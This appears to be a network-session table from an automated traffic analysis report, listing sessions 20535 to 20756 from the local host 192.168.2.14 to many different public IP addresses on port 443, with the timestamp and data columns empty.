                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20535192.168.2.1449760114.139.96.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20536192.168.2.1450974173.114.48.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20537192.168.2.144911225.112.182.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20538192.168.2.1455246135.25.39.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20539192.168.2.145778286.138.205.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20540192.168.2.1452364169.82.160.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20541192.168.2.144045481.35.188.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20542192.168.2.1442716121.130.56.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20543192.168.2.1454554153.167.109.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20544192.168.2.143407285.255.86.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20545192.168.2.1454596119.230.164.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20546192.168.2.1455320143.189.127.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20547192.168.2.143287668.121.72.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20548192.168.2.1438404132.161.152.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20549192.168.2.1458070178.155.151.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20550192.168.2.1455694184.53.237.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20551192.168.2.1436826129.43.18.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20552192.168.2.146019653.247.70.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20553192.168.2.1453242122.241.253.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20554192.168.2.1458650142.3.242.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20555192.168.2.144364080.56.71.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20556192.168.2.143893487.165.250.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20557192.168.2.1445236120.30.97.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20558192.168.2.145287294.142.20.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20559192.168.2.143812090.92.56.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20560192.168.2.144987063.143.67.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20561192.168.2.1446740101.92.156.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20562192.168.2.1452540116.11.22.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20563192.168.2.144177088.239.214.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20564192.168.2.143562427.59.102.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20565192.168.2.1440350112.168.74.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20566192.168.2.1458224194.215.183.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20567192.168.2.144818638.169.28.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20568192.168.2.145107692.217.188.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20569192.168.2.1439216161.7.20.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20570192.168.2.143429057.232.116.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20571192.168.2.145502469.184.36.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20572192.168.2.1455516114.136.52.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20573192.168.2.1459682119.167.104.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20574192.168.2.145854460.42.40.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20575192.168.2.1456562104.34.103.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20576192.168.2.1445598121.76.47.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20577192.168.2.1460910155.196.134.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20578192.168.2.1434820196.9.39.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20579192.168.2.1447306205.58.10.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20580192.168.2.145266269.38.85.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20581192.168.2.143516889.207.242.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20582192.168.2.1448292119.14.17.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20583192.168.2.1444036124.227.126.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20584192.168.2.143919677.0.150.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20585192.168.2.1454242208.207.99.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20586192.168.2.1460206164.62.121.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20587192.168.2.1460264218.189.23.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20588192.168.2.144139441.69.210.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20589192.168.2.14435882.88.137.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20590192.168.2.1452670218.202.223.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20591192.168.2.144666442.143.26.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20592192.168.2.1447540109.225.149.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20593192.168.2.1432898135.66.40.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20594192.168.2.1460344217.53.77.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20595192.168.2.1458290174.102.52.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20596192.168.2.144134290.167.151.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20597192.168.2.1452036202.218.55.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20598192.168.2.145597468.222.123.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20599192.168.2.1459588150.165.170.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20600192.168.2.14409705.157.103.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20601192.168.2.1450610198.229.172.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20602192.168.2.144353887.221.7.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20603192.168.2.146096077.154.169.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20604192.168.2.143691427.1.145.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20605192.168.2.1449940163.195.251.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20606192.168.2.1458702113.230.56.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20607192.168.2.1445494126.99.234.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20608192.168.2.1460802150.68.112.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20609192.168.2.144224838.80.248.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20610192.168.2.1455438186.149.79.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20611192.168.2.1434714136.107.171.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20612192.168.2.1439134173.217.213.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20613192.168.2.1455492100.131.28.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20614192.168.2.1450826136.56.135.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20615192.168.2.1432836112.229.146.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20616192.168.2.1448604136.146.62.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20617192.168.2.1459828107.208.170.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20618192.168.2.1444878131.124.57.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20619192.168.2.144761478.18.89.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20620192.168.2.143712899.151.141.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20621192.168.2.1435124216.185.128.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20622192.168.2.1458486104.207.135.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20623192.168.2.144834649.138.180.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20624192.168.2.1445630175.27.163.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20625192.168.2.1436452201.48.252.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20626192.168.2.1454156104.72.254.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20627192.168.2.1443566177.102.224.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20628192.168.2.14562409.90.59.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20629192.168.2.144117290.54.154.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20630192.168.2.1454776110.71.96.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20631192.168.2.1456976160.239.200.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20632192.168.2.144281488.35.162.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20633192.168.2.143985678.163.172.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20634192.168.2.144935452.197.243.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20635192.168.2.144671032.196.141.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20636192.168.2.144032858.22.243.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20637192.168.2.1442970167.107.84.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20638192.168.2.144273082.202.138.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20639192.168.2.143957299.171.111.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20640192.168.2.145116872.55.152.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20641192.168.2.143936695.36.211.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20642192.168.2.1443014138.64.0.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20643192.168.2.145061420.241.184.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20644192.168.2.14401361.211.103.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20645192.168.2.143905073.161.99.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20646192.168.2.1448594109.61.207.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20647192.168.2.1445488143.230.177.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20648192.168.2.144848464.190.208.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20649192.168.2.1451242208.124.128.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20650192.168.2.145985032.232.46.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20651192.168.2.1455016103.12.85.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20652192.168.2.1449062179.152.223.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20653192.168.2.145841652.155.205.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20654192.168.2.145994696.203.82.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20655192.168.2.143457873.95.205.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20656192.168.2.145524248.66.54.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20657192.168.2.143487631.73.79.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20658192.168.2.143899649.28.170.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20659192.168.2.1436336159.20.112.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20660192.168.2.144025453.129.233.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20661192.168.2.1445682135.14.70.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20662192.168.2.1457932122.190.187.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20663192.168.2.1446156136.109.152.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20664192.168.2.1458546196.144.230.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20665192.168.2.1442188183.228.96.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20666192.168.2.143866885.219.159.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20667192.168.2.1446840107.137.212.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20668192.168.2.1449544135.5.42.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20669192.168.2.144996825.55.125.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20670192.168.2.1454554181.92.138.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20671192.168.2.1451474106.102.243.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20672192.168.2.1433602155.219.194.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20673192.168.2.143357082.97.9.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20674192.168.2.1445810115.186.11.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20675192.168.2.1443662101.61.195.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20676192.168.2.144411038.44.208.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20677192.168.2.144654212.62.225.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20678192.168.2.1455334110.171.183.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20679192.168.2.145174878.66.244.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20680192.168.2.145757439.205.33.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20681192.168.2.145579619.43.91.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20682192.168.2.145632062.169.55.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20683192.168.2.1449814161.11.60.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20684192.168.2.1446524119.231.214.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20685192.168.2.1458548184.247.41.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20686192.168.2.1433332162.52.110.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20687192.168.2.1433702154.248.49.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20688192.168.2.1451882158.67.17.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20689192.168.2.1452254130.171.55.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20690192.168.2.144536214.99.107.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20691192.168.2.1450700174.149.26.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20692192.168.2.1452616101.1.77.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20693192.168.2.14415302.38.22.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20694192.168.2.1448888198.236.109.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20695192.168.2.1446788122.119.21.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20696192.168.2.144102834.192.155.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20697192.168.2.1455188187.119.169.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20698192.168.2.1436960153.72.167.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20699192.168.2.144543285.190.149.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20700192.168.2.1442508132.241.94.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20701192.168.2.1460218146.102.210.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20702192.168.2.144742869.29.122.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20703192.168.2.14513261.128.242.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20704192.168.2.1435364123.146.99.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20705192.168.2.1440768182.199.60.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20706192.168.2.145763671.83.195.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20707192.168.2.146025824.142.51.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20708192.168.2.144293289.33.162.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20709192.168.2.14489561.232.99.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20710192.168.2.1456292106.146.196.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20711192.168.2.1449340101.17.102.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20712192.168.2.144518037.195.174.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20713192.168.2.144588846.31.56.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20714192.168.2.143530812.151.81.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20715192.168.2.1451844130.217.113.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20716192.168.2.145431640.5.214.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20717192.168.2.1449206145.188.72.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20718192.168.2.1456010210.73.37.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20719192.168.2.1447102146.87.249.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20720192.168.2.1456444142.74.31.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20721192.168.2.1450760184.216.35.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20722192.168.2.143529450.178.224.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20723192.168.2.144383218.65.144.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20724192.168.2.1452484103.116.129.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20725192.168.2.1439258167.110.83.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20726192.168.2.1444634197.184.45.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20727192.168.2.1441038131.69.158.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20728192.168.2.1460428211.83.109.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20729192.168.2.1435200207.209.237.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20730192.168.2.1460856220.198.58.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20731192.168.2.143281842.93.211.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20732192.168.2.1443596116.95.103.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20733192.168.2.1444270110.141.175.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20734192.168.2.145503472.56.126.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20735192.168.2.1443136132.49.170.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20736192.168.2.143685254.208.84.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20737192.168.2.144401286.118.182.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20738192.168.2.1454408143.177.228.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20739192.168.2.144880825.100.138.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20740192.168.2.143609458.224.193.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20741192.168.2.1453798109.186.32.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20742192.168.2.144013457.83.151.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20743192.168.2.144192266.255.153.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20744192.168.2.1443204130.18.144.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20745192.168.2.145455034.110.144.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20746192.168.2.1435360177.98.96.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20747192.168.2.1437670126.100.130.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20748192.168.2.1448220117.65.224.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20749192.168.2.1436452140.232.198.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20750192.168.2.145096061.124.95.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20751192.168.2.1441478100.2.170.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20752192.168.2.14464808.59.225.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20753192.168.2.1452306124.152.44.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20754192.168.2.145724419.2.105.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20755192.168.2.1438608158.110.105.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20756192.168.2.1446142122.104.175.99443
